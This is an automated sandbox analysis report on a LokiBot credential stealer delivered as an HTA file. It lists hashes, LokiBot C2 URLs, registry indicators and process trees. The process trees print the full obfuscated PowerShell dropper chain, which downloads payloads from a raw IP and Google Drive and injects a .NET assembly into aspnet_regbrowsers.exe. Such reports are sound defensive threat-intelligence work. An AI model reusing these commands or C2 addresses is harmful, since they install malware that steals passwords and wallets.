lokibot | 5775dd79d6529e77182ceccb5f0a1d9d22d4884017df41dade409caf6471e48f

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-10-2024 09:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

creatednewthingsformee.hta
Size

205KB
MD5

0b94188f0fe1baed9f97e0a69806b6e9
SHA1

65a871c11c36799a747b8b40154130415f6e6f84
SHA256

5775dd79d6529e77182ceccb5f0a1d9d22d4884017df41dade409caf6471e48f
SHA512

ad87371d82d5887377cc5882111f26849c6783427bf15c2fe235ca7570898d8937032e445e377acfe6d495ba01a0cad558fd0a3ecb23152b177ef5708639b75a
SSDEEP

96:43F975adf4WbLdfSWbmx0JnfXdfmdfvUWbEdfAQ:43F15Of4GRfSGmx0J1fqfvUGAfAQ

Score

10^/10

lokibot collection defense_evasion discovery execution spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

lokibot

http://94.156.177.220/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot

Blocklisted process makes network request 7 IoCs

Processes:

pOwErshEll.ExEpowershell.exepowershell.exe

flow	pid	process
26	2216	pOwErshEll.ExE
33	1388	powershell.exe
37	1388	powershell.exe
40	3232	powershell.exe
41	3232	powershell.exe
42	1388	powershell.exe
59	3232	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2188 powershell.exe
1388 powershell.exe
4352 powershell.exe
3232 powershell.exe
Evasion via Device Credential Deployment 4 IoCs
defense_evasion execution

Processes:

powershell.exepOwErshEll.ExEpowershell.exepOwErshEll.ExE

pid process

3408 powershell.exe
2888 pOwErshEll.ExE
1808 powershell.exe
2216 pOwErshEll.ExE

pid	process
2188	powershell.exe
1388	powershell.exe
4352	powershell.exe
3232	powershell.exe

pid	process
3408	powershell.exe
2888	pOwErshEll.ExE
1808	powershell.exe
2216	pOwErshEll.ExE

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exeWScript.exemshta.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

aspnet_regbrowsers.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	aspnet_regbrowsers.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	aspnet_regbrowsers.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	aspnet_regbrowsers.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

32 drive.google.com
33 drive.google.com
40 drive.google.com

flow	ioc
32	drive.google.com
33	drive.google.com
40	drive.google.com

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process	target process
PID 1388 set thread context of 3732	1388	powershell.exe	aspnet_regbrowsers.exe
PID 3232 set thread context of 2648	3232	powershell.exe	aspnet_regbrowsers.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exepowershell.execvtres.exeWScript.exepowershell.exepowershell.exepowershell.execsc.execsc.exepOwErshEll.ExEcvtres.exemshta.exepOwErshEll.ExEpowershell.exemshta.exeWScript.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOwErshEll.ExE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOwErshEll.ExE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Modifies registry class 2 IoCs

Processes:

pOwErshEll.ExEpOwErshEll.ExE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	pOwErshEll.ExE
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	pOwErshEll.ExE

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

pOwErshEll.ExEpowershell.exepowershell.exepowershell.exepOwErshEll.ExEpowershell.exepowershell.exepowershell.exe

pid	process
2216	pOwErshEll.ExE
2216	pOwErshEll.ExE
3408	powershell.exe
3408	powershell.exe
2188	powershell.exe
2188	powershell.exe
1388	powershell.exe
1388	powershell.exe
1388	powershell.exe
2888	pOwErshEll.ExE
2888	pOwErshEll.ExE
2888	pOwErshEll.ExE
1808	powershell.exe
1808	powershell.exe
1808	powershell.exe
4352	powershell.exe
4352	powershell.exe
4352	powershell.exe
3232	powershell.exe
3232	powershell.exe
3232	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

pOwErshEll.ExEpowershell.exepowershell.exepowershell.exepOwErshEll.ExEpowershell.exepowershell.exepowershell.exeaspnet_regbrowsers.exe

description	pid	process
Token: SeDebugPrivilege	2216	pOwErshEll.ExE
Token: SeDebugPrivilege	3408	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	1388	powershell.exe
Token: SeDebugPrivilege	2888	pOwErshEll.ExE
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeDebugPrivilege	4352	powershell.exe
Token: SeDebugPrivilege	3232	powershell.exe
Token: SeDebugPrivilege	3732	aspnet_regbrowsers.exe

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

mshta.exepOwErshEll.ExEcsc.exeWScript.exepowershell.exemshta.exepOwErshEll.ExEcsc.exeWScript.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4100 wrote to memory of 2216	4100	mshta.exe	pOwErshEll.ExE
PID 4100 wrote to memory of 2216	4100	mshta.exe	pOwErshEll.ExE
PID 4100 wrote to memory of 2216	4100	mshta.exe	pOwErshEll.ExE
PID 2216 wrote to memory of 3408	2216	pOwErshEll.ExE	powershell.exe
PID 2216 wrote to memory of 3408	2216	pOwErshEll.ExE	powershell.exe
PID 2216 wrote to memory of 3408	2216	pOwErshEll.ExE	powershell.exe
PID 2216 wrote to memory of 3852	2216	pOwErshEll.ExE	csc.exe
PID 2216 wrote to memory of 3852	2216	pOwErshEll.ExE	csc.exe
PID 2216 wrote to memory of 3852	2216	pOwErshEll.ExE	csc.exe
PID 3852 wrote to memory of 684	3852	csc.exe	cvtres.exe
PID 3852 wrote to memory of 684	3852	csc.exe	cvtres.exe
PID 3852 wrote to memory of 684	3852	csc.exe	cvtres.exe
PID 2216 wrote to memory of 3064	2216	pOwErshEll.ExE	WScript.exe
PID 2216 wrote to memory of 3064	2216	pOwErshEll.ExE	WScript.exe
PID 2216 wrote to memory of 3064	2216	pOwErshEll.ExE	WScript.exe
PID 3064 wrote to memory of 2188	3064	WScript.exe	powershell.exe
PID 3064 wrote to memory of 2188	3064	WScript.exe	powershell.exe
PID 3064 wrote to memory of 2188	3064	WScript.exe	powershell.exe
PID 2188 wrote to memory of 1388	2188	powershell.exe	powershell.exe
PID 2188 wrote to memory of 1388	2188	powershell.exe	powershell.exe
PID 2188 wrote to memory of 1388	2188	powershell.exe	powershell.exe
PID 4620 wrote to memory of 2888	4620	mshta.exe	pOwErshEll.ExE
PID 4620 wrote to memory of 2888	4620	mshta.exe	pOwErshEll.ExE
PID 4620 wrote to memory of 2888	4620	mshta.exe	pOwErshEll.ExE
PID 2888 wrote to memory of 1808	2888	pOwErshEll.ExE	powershell.exe
PID 2888 wrote to memory of 1808	2888	pOwErshEll.ExE	powershell.exe
PID 2888 wrote to memory of 1808	2888	pOwErshEll.ExE	powershell.exe
PID 2888 wrote to memory of 4276	2888	pOwErshEll.ExE	csc.exe
PID 2888 wrote to memory of 4276	2888	pOwErshEll.ExE	csc.exe
PID 2888 wrote to memory of 4276	2888	pOwErshEll.ExE	csc.exe
PID 4276 wrote to memory of 5064	4276	csc.exe	cvtres.exe
PID 4276 wrote to memory of 5064	4276	csc.exe	cvtres.exe
PID 4276 wrote to memory of 5064	4276	csc.exe	cvtres.exe
PID 2888 wrote to memory of 1520	2888	pOwErshEll.ExE	WScript.exe
PID 2888 wrote to memory of 1520	2888	pOwErshEll.ExE	WScript.exe
PID 2888 wrote to memory of 1520	2888	pOwErshEll.ExE	WScript.exe
PID 1520 wrote to memory of 4352	1520	WScript.exe	powershell.exe
PID 1520 wrote to memory of 4352	1520	WScript.exe	powershell.exe
PID 1520 wrote to memory of 4352	1520	WScript.exe	powershell.exe
PID 4352 wrote to memory of 3232	4352	powershell.exe	powershell.exe
PID 4352 wrote to memory of 3232	4352	powershell.exe	powershell.exe
PID 4352 wrote to memory of 3232	4352	powershell.exe	powershell.exe
PID 1388 wrote to memory of 3732	1388	powershell.exe	aspnet_regbrowsers.exe
PID 1388 wrote to memory of 3732	1388	powershell.exe	aspnet_regbrowsers.exe
PID 1388 wrote to memory of 3732	1388	powershell.exe	aspnet_regbrowsers.exe
PID 1388 wrote to memory of 3732	1388	powershell.exe	aspnet_regbrowsers.exe
PID 1388 wrote to memory of 3732	1388	powershell.exe	aspnet_regbrowsers.exe
PID 1388 wrote to memory of 3732	1388	powershell.exe	aspnet_regbrowsers.exe
PID 1388 wrote to memory of 3732	1388	powershell.exe	aspnet_regbrowsers.exe
PID 1388 wrote to memory of 3732	1388	powershell.exe	aspnet_regbrowsers.exe
PID 1388 wrote to memory of 3732	1388	powershell.exe	aspnet_regbrowsers.exe
PID 3232 wrote to memory of 2648	3232	powershell.exe	aspnet_regbrowsers.exe
PID 3232 wrote to memory of 2648	3232	powershell.exe	aspnet_regbrowsers.exe
PID 3232 wrote to memory of 2648	3232	powershell.exe	aspnet_regbrowsers.exe
PID 3232 wrote to memory of 2648	3232	powershell.exe	aspnet_regbrowsers.exe
PID 3232 wrote to memory of 2648	3232	powershell.exe	aspnet_regbrowsers.exe
PID 3232 wrote to memory of 2648	3232	powershell.exe	aspnet_regbrowsers.exe
PID 3232 wrote to memory of 2648	3232	powershell.exe	aspnet_regbrowsers.exe
PID 3232 wrote to memory of 2648	3232	powershell.exe	aspnet_regbrowsers.exe
PID 3232 wrote to memory of 2648	3232	powershell.exe	aspnet_regbrowsers.exe

outlook_office_path 1 IoCs

Processes:

aspnet_regbrowsers.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	aspnet_regbrowsers.exe

outlook_win_path 1 IoCs

Processes:

aspnet_regbrowsers.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	aspnet_regbrowsers.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatednewthingsformee.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4100
- C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE
  "C:\Windows\sYsteM32\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE" "pOweRshell -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe ; IeX($(iEX('[sYsTem.teXt.ENcoding]'+[ChAR]0X3A+[ChAR]0X3A+'utF8.geTstRInG([sYsTeM.CoNVeRt]'+[CHaR]0X3A+[char]0x3a+'fRoMBase64sTrinG('+[ChAR]0X22+'JEhReHJKU2ZXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlUkRFRkluaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHl2Q2FjT3NiUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxVEN2dHJKVElJcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHdUc0dkTE0sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXdMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAib1V1WXR5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpRFFLc1Z2b0pUUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkSFF4ckpTZlc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82NS9zZWV0aGViZXN0aHRpbmdzd2l0aG1ld2hpY2hnaXZlZ3JlYXRvdXRwdXRvZm1lZ29vZC50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdGh0aW5nc3dpdGhtZXdoaWNoZ2l2ZWdyZWF0b3V0cHV0b2ZtLnZiUyIsMCwwKTtTdGFSdC1TbGVFcCgzKTtzdEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdGh0aW5nc3dpdGhtZXdoaWNoZ2l2ZWdyZWF0b3V0cHV0b2ZtLnZiUyI='+[cHar]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2216
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3408
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2iji34p1\2iji34p1.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3852
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2B4.tmp" "c:\Users\Admin\AppData\Local\Temp\2iji34p1\CSC2FED37F419914EBCB8F234D6FB83AB0.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:684
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3064
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRTaEVMTElkWzFdKyRzaGVsTElkWzEzXSsneCcpICgoJ1M3RmltYWdlJysnVXJsID0gYkJIaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgYkJIO1M3RndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbicrJ3Q7UzdGaW1hZ2VCeXRlcyA9IFM3RndlYkNsaWVudC5Eb3dubG9hZERhJysndGEoUzdGaW1hJysnZ2VVcmwpO1M3RmltYWdlVGV4dCA9JysnIFtTeXN0ZW0uVGUnKyd4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nJysnKFM3RmltYWdlQnl0ZXMpO1M3RnN0YXJ0RmxhZyA9IGJCSDw8JysnQkFTRTY0XycrJ1NUQVJUPj5iQkg7UzdGZW5kRmxhZyA9IGInKydCSDw8QkFTRTY0X0VORD4+YkJIO1M3RnN0YXJ0SW5kZXggPSBTN0ZpbWFnZVRleHQuSW5kZXhPZihTN0ZzdGFydEZsYWcpO1M3RmVuZEluZGV4JysnID0gUzdGaW1hZ2VUZXh0LkluZGV4T2YoUzdGZW5kRmxhJysnZyk7UzdGc3RhcnRJbmRleCAtZ2UgJysnMCAtYW5kIFM3RmVuZEluZGV4IC1ndCBTN0ZzdCcrJ2FydEluZGV4O1M3RnN0YXJ0SW5kZXggKz0gUzdGJysnc3RhcnRGbGFnLkxlbmcnKyd0aDtTN0ZiYScrJ3NlNjRMZW5ndGggPSBTN0ZlbmRJbmRleCAtIFM3RnN0YXInKyd0SW5kZXg7UzdGYmFzZTY0Q29tbWFuZCA9IFM3RmltYWdlVGV4dC5TdWJzdHJpbmcoUzdGc3RhcnRJbmRleCwgUzdGYmFzZTY0TCcrJ2VuZ3RoKTsnKydTN0ZiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luICcrJyhTN0ZiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgQkRGIEZvckVhY2gtT2JqZWN0IHsgUzdGXyB9KVsnKyctJysnMS4nKycuLShTN0ZiYXNlNjRDb21tYW5kLkxlbmd0aCldO1M3RmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoUzdGYicrJ2FzZTY0UmV2ZXJzZWQpO1M3RmxvYWRlZEFzJysnc2VtJysnYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChTN0Zjb21tYScrJ25kJysnQnl0JysnZXMpO1M3RnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QoYkJIVkFJJysnYkJIKTtTN0Z2YWlNZXRob2QuSW52b2tlKFM3Rm51JysnbGwsIEAoYkJIdHh0LktMTExQTVMvNTYvMTUxLjg3MS42NC44OTEvLzpwdHRoYkJILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhkZXNhdGl2YWRvYkInKydILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhhc3BuZXRfcmVnYnJvd3NlcnNiQkgsIGJCSGRlc2F0aXZhZG9iQkgsIGJCSGRlc2F0aXZhZG9iQkgsYkJIZGVzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvJysnYkJILGJCSGRlc2F0aXZhZG8nKydiQkgsYkJIZGUnKydzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvYkJILGJCSDFiQkgsYkJIZGVzYXRpdmFkb2JCSCkpOycpLlJlUGxhY0UoJ0JERicsJ3wnKS5SZVBsYWNFKCdiQkgnLFtzdFJpbmddW2NoYXJdMzkpLlJlUGxhY0UoJ1M3RicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2188
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ShELLId[1]+$shelLId[13]+'x') (('S7Fimage'+'Url = bBHhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur bBH;S7FwebClient = New-Object System.Net.WebClien'+'t;S7FimageBytes = S7FwebClient.DownloadDa'+'ta(S7Fima'+'geUrl);S7FimageText ='+' [System.Te'+'xt.Encoding]::UTF8.GetString'+'(S7FimageBytes);S7FstartFlag = bBH<<'+'BASE64_'+'START>>bBH;S7FendFlag = b'+'BH<<BASE64_END>>bBH;S7FstartIndex = S7FimageText.IndexOf(S7FstartFlag);S7FendIndex'+' = S7FimageText.IndexOf(S7FendFla'+'g);S7FstartIndex -ge '+'0 -and S7FendIndex -gt S7Fst'+'artIndex;S7FstartIndex += S7F'+'startFlag.Leng'+'th;S7Fba'+'se64Length = S7FendIndex - S7Fstar'+'tIndex;S7Fbase64Command = S7FimageText.Substring(S7FstartIndex, S7Fbase64L'+'ength);'+'S7Fbase64Reversed = -jo'+'in '+'(S7Fbase64Command.ToCharArray() BDF ForEach-Object { S7F_ })['+'-'+'1.'+'.-(S7Fbase64Command.Length)];S7FcommandBytes = [System.Convert]::FromBase64String(S7Fb'+'ase64Reversed);S7FloadedAs'+'sem'+'bly = [System.Reflection.Assembly]::Load(S7Fcomma'+'nd'+'Byt'+'es);S7FvaiMethod = [dnlib.IO.Home]'+'.GetMethod(bBHVAI'+'bBH);S7FvaiMethod.Invoke(S7Fnu'+'ll, @(bBHtxt.KLLLPMS/56/151.871.64.891//:ptthbBH, bBHdesativadobBH, bBHdesativadobB'+'H, bBHdesativadobBH, bBHaspnet_regbrowsersbBH, bBHdesativadobBH, bBHdesativadobBH,bBHdesativadobBH,bBHdesativado'+'bBH,bBHdesativado'+'bBH,bBHde'+'sativadobBH,bBHdesativadobBH,bBH1bBH,bBHdesativadobBH));').RePlacE('BDF','|').RePlacE('bBH',[stRing][char]39).RePlacE('S7F','$'))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1388
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        6⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:3732

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2220

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\creatednewthingsformee.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4620
- C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE
  "C:\Windows\sYsteM32\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE" "pOweRshell -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe ; IeX($(iEX('[sYsTem.teXt.ENcoding]'+[ChAR]0X3A+[ChAR]0X3A+'utF8.geTstRInG([sYsTeM.CoNVeRt]'+[CHaR]0X3A+[char]0x3a+'fRoMBase64sTrinG('+[ChAR]0X22+'JEhReHJKU2ZXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlUkRFRkluaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHl2Q2FjT3NiUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxVEN2dHJKVElJcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHdUc0dkTE0sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXdMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAib1V1WXR5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpRFFLc1Z2b0pUUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkSFF4ckpTZlc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82NS9zZWV0aGViZXN0aHRpbmdzd2l0aG1ld2hpY2hnaXZlZ3JlYXRvdXRwdXRvZm1lZ29vZC50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdGh0aW5nc3dpdGhtZXdoaWNoZ2l2ZWdyZWF0b3V0cHV0b2ZtLnZiUyIsMCwwKTtTdGFSdC1TbGVFcCgzKTtzdEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdGh0aW5nc3dpdGhtZXdoaWNoZ2l2ZWdyZWF0b3V0cHV0b2ZtLnZiUyI='+[cHar]0X22+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
